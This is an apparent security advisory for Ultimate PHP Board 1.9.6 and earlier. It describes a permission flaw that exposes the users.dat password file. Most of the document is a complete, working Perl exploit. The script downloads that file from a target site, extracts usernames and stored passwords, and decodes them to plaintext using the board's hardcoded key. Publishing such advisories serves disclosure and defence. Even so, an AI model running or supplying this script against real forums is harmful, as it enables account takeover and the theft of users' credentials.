Ultimate PHP Board Password Hash DecryptorSummary
"UPB is a forum/message board script. It supports threaded discussion with a comprehensive text database system that we wrote here at PHP outburst for the back end."
A flaw in the permission settings of UPB allows arbitrary access to file containing password hash, the following exploit can decrypt this password hash and retrieve the plain text equivalent of the password.
Credit:
The information has been provided by Alberto Trivero.
Details
Vulnerable Systems:
* Ultimate PHP Board Password Hash Decryptor versions 1.9.6 and prior
Exploit:
#!/usr/bin/perl
#
# Passwords Decrypter for UPB <= 1.9.6
# Discovered and Coded by Alberto Trivero
# Password file is located at: http://www.example.com/upb/db/users.dat /str0ke
use Getopt::Std;
use LWP::Simple;
getopt('hfu');
print "\n\t========================================\n";
print "\t= Passwords Decrypter for UPB <= 1.9.6 =\n";
print "\t= by Alberto Trivero =\n";
print "\t========================================\n\n";
if(!$opt_h or !($opt_f or $opt_u) or ($opt_f && $opt_u)) {
print "Usage:\nperl $0 -h [full_target_path] [-f [output_file_name] OR -u [username]]\n\n";
print "Examples:\nperl $0 -h http://www.example.com/upb/ -f results.txt\n";
print "perl $0 -h http://www.example.com/upb/ -u Alby\n";
exit(0);
}
$key="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtn".
"eltaomowpkfvmmogbayankrnrhmbduzfmpctxiidweripxw".
"glmwrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdw".
"upkzvqnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqe".
"bcuiqggccl";
$page=get($opt_h."db/users.dat") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $opt_h\n";
@page=split(/\n/,$page);
if($opt_f) {
open(RESULTS,"+>$opt_f") || die "[-] Unable to open $opt_f: $!";
print RESULTS "Results for $opt_h\n","="x40,"\n\n";
for($in=0;$in<@page;$in++) {
$page[$in]=~m/^(.*?)<~>/ && print RESULTS "Username: $1\n";
$page[$in]=~m/^$1<~>(.*?)<~>/ && print RESULTS "Crypted Password: $1\n";
&decrypt;
print RESULTS "Decrypted Password: $crypt\n\n";
$crypt="";
}
close(RESULTS);
print "[+] Results printed correct in: $opt_f\n";
}
if($opt_u) {
for($in=0;$in<@page;$in++) {
if($page[$in]=~m/^$opt_u<~>(.*?)<~>/) {
print "[+] Username: $opt_u\n";
print "[+] Crypted Password: $1\n";
&decrypt;
print "[+] Decrypted Password: $crypt\n";
exit(0);
}
}
print "[-] Username '$opt_u' doesn't exist\n";
}
sub decrypt {
for($i=0;$i<length($1);$i++) {
$i_key=ord(substr($key, $i, 1));
$i_text=ord(substr($1, $i, 1));
$n_key=ord(substr($key, $i+1, 1));
$i_crypt=$i_text + $n_key;
$i_crypt-=$i_key;
$crypt.=chr($i_crypt);
}
}
推荐
评论(0条)
